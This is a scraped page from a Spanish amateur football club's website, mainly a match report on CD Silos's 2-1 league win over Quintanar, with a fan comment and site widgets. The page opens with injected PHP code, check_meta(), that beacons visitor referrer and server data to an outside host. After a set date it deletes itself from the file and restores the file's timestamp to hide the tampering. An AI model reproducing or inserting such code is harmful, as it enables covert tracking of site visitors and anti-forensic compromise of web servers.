check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Sufrida victoria para comenzar la temporada.

La Afición

Calendario

<<  Abril 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
       1  2
  3  4  5  6  7  8  9
10111213141516
17181920212223
24252627282930
Banner
Banner
Banner
Banner

Acceso Privado Equipo



Sufrida victoria para comenzar la temporada. PDF Imprimir E-mail
Martes, 06 de Octubre de 2015 07:36

Máxima eficacia por parte del Club deportivo Silos en el primer choque de liga que le sirvió para inaugurar su casillero de victorias. Comenzaba el partido en Silos sin caras nuevas en la alineación titular.

Partido disputado en sus inicios si un dominador claro con un Quintanar bien plantado que no daba ninguna opción al equipo local. No tardaría mucho en adelantarse los visitantes, balón largo que la defensa silense no consigue despejar siendo aprovechado por Quintanar para marcar tras rechace de un tiro cruzado. A partir de ese momento Silos empezó a llegar un poco más si bien no creaba ocasiones de claro peligro hasta que un balón colgado por Ricar desde banda izquierda era rematado de cabeza por Sancho que hacia el empate a uno en el marcador. El partido transcurría sin ocasiones claras, con Quintanar mandando balones largos y aprovechando su seguridad defensiva, hasta que ya en la segunda parte llegaría la jugada que daría los tres puntos a Silos. Pequeño despiste la defensa de Quintanar en un saque de banda ,Sancho saca rápidamente para la carrera de Ricar que de forma inapelable empalma el balón en la cruceta derecha de la portería de Quintanar. Ya con la ventaja local llegaron las ocasiones de Quintanar, mucho peligro en los continuos balones al área llegando a mandar un balón a la base del poste de la portería de Adrián, por parte de Silos lo más destacable fue una jugada de Sancho en la que se pidió penalti y una internada de Jorge en la que no acierta a resolver después de deshacerse de su marcador. Primera victoria de la temporada en la que nos permitió ver el debut de un nuevo compañero, Sergio, la próxima jornada nuestro equipo tiene jornada de descanso.

 

DEPORTIVO¡¡¡¡¡¡¡

 

Comentarios  

 
0 #1 Justo 07-10-2015 11:58
Deportivooooooo ooooooo :lol: :lol:
Citar
 

Escribir un comentario

Código de seguridad
Refescar

Banner
Banner

Colaboradores

Banner
Banner
Banner
Banner
Banner
Banner



By vicencid. Potenciado por Jommla!. Valid XHTML and CSS.